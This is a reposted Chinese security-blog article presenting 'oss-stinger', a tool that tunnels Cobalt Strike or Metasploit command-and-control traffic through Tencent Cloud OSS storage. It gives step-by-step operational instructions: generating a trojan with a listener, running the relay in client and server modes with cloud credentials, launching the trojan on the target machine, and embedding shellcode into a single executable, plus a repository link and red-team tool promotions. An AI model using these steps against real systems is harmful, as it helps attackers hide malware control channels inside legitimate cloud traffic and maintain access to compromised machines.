CS/MSF上线工具 | oss-stinger
2023-11-15 08:4:19 Author: 系统安全运维(查看原文) 阅读量:4 收藏

0x01 工具介绍
利用腾讯云oss,来转发http流量,可以用来cs/msf线上等
0x02 安装与使用
1、首先,现在cs生成一个http的listen,并把host都改成127.0.0.1,然后生成木马 然后再把Host改会公网IP(这一步很重要)
2、然后去腾讯云,申请一个oss盘。拿到URL 然后再去拿SecretKey和
 SecretID https://console.cloud.tencent.com/cam/capi
3、然后就可以使用我们的工具了,先在客机上启动一个转发器,使用命令
oss-stinger.exe -mode client -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey
4、然后服务器运行
oss-stinger.exe -mode server -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey
5、然后在客机双击你的木马,就能上线了 
6、如果要弄成一个文件,自行修改代码把shellcode加入进去然后用go runshellcode()即可。
secretkey和secretid的安全问题,目前没有什么好的解决方案,可以考虑搞一个动态下发的。自己修改吧。
0x03 项目链接下载
https://github.com/9bie/oss-stinger
如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
关注我,学习网络安全不迷路

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247522155&idx=2&sn=46712b6ce411a8c8ea1c12c7d8c16262&chksm=c308441bf47fcd0d1987f91fdf5d65aa146ce7fdb85f43c6920bab838db78f5c4f5479c7c231&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh